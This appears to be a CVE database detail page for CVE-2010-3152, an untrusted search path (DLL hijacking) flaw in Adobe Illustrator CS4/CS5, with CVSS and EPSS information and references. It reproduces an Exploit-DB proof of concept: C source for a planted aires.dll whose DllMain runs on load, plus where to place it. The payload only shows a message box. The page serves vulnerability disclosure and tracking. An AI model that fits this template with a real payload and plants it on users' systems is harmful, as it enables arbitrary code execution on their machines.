CVE-2010-3152 : Detail

CVE-2010-3152

2.88%V3
Network
2010-08-27
16h10 +00:00
2018-10-10
16h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Untrusted search path vulnerability in Adobe Illustrator CS4 14.0.0, CS5 15.0.1 and earlier, and possibly other versions allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse dwmapi.dll or aires.dll that is located in the same folder as an .ait or .eps file.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 14773

Publication date : 2010-08-24
22h00 +00:00
Author : Glafkos Charalambous
EDB Verified : No

/* Exploit Title: Adobe Illustrator CS4 DLL Hijacking Exploit (aires.dll) Date: August 25, 2010 Author: Glafkos Charalambous (glafkos[@]astalavista[dot]com) Version: CS4 v14.0.0 Tested on: Windows 7 x64 Ultimate Vulnerable extensions: .ait .eps Greetz: Astalavista, OffSEC, Exploit-DB Note: Create folders system\enu_us and put aires.dll */ #include <windows.h> BOOL WINAPI DllMain ( HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { switch (fdwReason) { case DLL_PROCESS_ATTACH: dll_hijack(); case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } int dll_hijack() { MessageBox(0, "Adobe DLL Hijacking!", "DLL Message", MB_OK); }

Products Mentioned

Configuraton 0

Adobe>>Illustrator >> Version 14.0

Adobe>>Illustrator >> Version 15.0.1

    References

    http://www.vupen.com/english/advisories/2010/2198
    Tags : vdb-entry, x_refsource_VUPEN
    http://secunia.com/advisories/41134
    Tags : third-party-advisory, x_refsource_SECUNIA
    http://www.exploit-db.com/exploits/14773/
    Tags : exploit, x_refsource_EXPLOIT-DB
    http://www.securitytracker.com/id?1024865
    Tags : vdb-entry, x_refsource_SECTRACK
    http://osvdb.org/67534
    Tags : vdb-entry, x_refsource_OSVDB